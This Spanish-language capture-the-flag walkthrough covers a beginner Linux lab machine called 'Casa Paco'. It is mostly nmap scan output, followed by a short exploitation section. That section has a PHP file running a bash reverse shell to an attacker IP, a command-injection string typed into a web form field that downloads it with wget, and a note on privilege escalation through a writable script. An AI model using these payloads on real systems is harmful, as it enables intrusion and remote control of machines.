Casa Paco
| Sistema operativo | Dificultad | Fecha de Lanzamiento | Creador |
|---|---|---|---|
| Linux | Principiante | 11 Enero 2025 | Condor & CuriosidadesDeHackers |
Reconocimiento
Lanzamos una traza ICMP a la máquina objetivo para comprobar que tengamos conectividad.
Enumeración inicial
Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.
nmap -sS -p- --open -Pn -n --min-rate 5000 -vvv 192.168.1.7 -vvv -oG openPorts
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 20:04 -03
Initiating ARP Ping Scan at 20:04
Scanning 192.168.1.7 [1 port]
Completed ARP Ping Scan at 20:04, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:04
Scanning 192.168.1.7 [65535 ports]
Discovered open port 80/tcp on 192.168.1.7
Discovered open port 22/tcp on 192.168.1.7
Completed SYN Stealth Scan at 20:05, 36.51s elapsed (65535 total ports)
Nmap scan report for 192.168.1.7
Host is up, received arp-response (0.00078s latency).
Scanned at 2025-01-14 20:04:51 -03 for 37s
Not shown: 52473 filtered tcp ports (no-response), 13060 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:74:83:E3 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 36.68 seconds
Raw packets sent: 124251 (5.467MB) | Rcvd: 13065 (522.604KB)
Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos.
nmap -sCV -p22,80 -oN servicesScan -vvv 192.168.1.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 20:06 -03
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
Initiating ARP Ping Scan at 20:06
Scanning 192.168.1.7 [1 port]
Completed ARP Ping Scan at 20:06, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:06
Completed Parallel DNS resolution of 1 host. at 20:06, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:06
Scanning 192.168.1.7 [2 ports]
Discovered open port 80/tcp on 192.168.1.7
Discovered open port 22/tcp on 192.168.1.7
Completed SYN Stealth Scan at 20:06, 0.02s elapsed (2 total ports)
Initiating Service scan at 20:06
Scanning 2 services on 192.168.1.7
Completed Service scan at 20:06, 6.04s elapsed (2 services on 1 host)
NSE: Script scanning 192.168.1.7.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.45s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
Nmap scan report for 192.168.1.7
Host is up, received arp-response (0.00065s latency).
Scanned at 2025-01-14 20:06:15 -03 for 6s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey:
| 256 72:58:87:c5:87:63:3f:fa:43:da:ed:69:2f:ed:a7:d0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDeEPbzWvfbdVsbmQKgz5ST3C5xmvjfb4i4d59wj4cO2mnMZW9jciFeto0YjsabjZcqwslleYKgrCinkVK7TdFA=
| 256 13:31:bc:26:a0:2e:4a:ae:b8:31:75:7f:0e:17:32:4e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICroiKE+wS8F7kGGigBnhAMdgLUi1FftnzIIP1qHGTZF
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://casapaco.thl
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:74:83:E3 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:06
Completed NSE at 20:06, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.08 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
Explotación inicial
Nos enviamos una reverse shell.
index.html
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.1.15/4444 0>&1'"); ?>
Ingresamos lo siguiente en el campo Plato.
Cocido||busybox wget http://192.168.1.15/index.html -O shell.php
Elevación de privilegios
Vemos que el archivo fabada.sh tiene permisos de escritura.
Nos enviamos una reverse shell como el usuario pacogerente.
Nos ponemos en escucha con netcat por el puerto 443.
nc -lnvp 443
Recibimos la conexión.
Post Explotación
Leemos la flag de root.
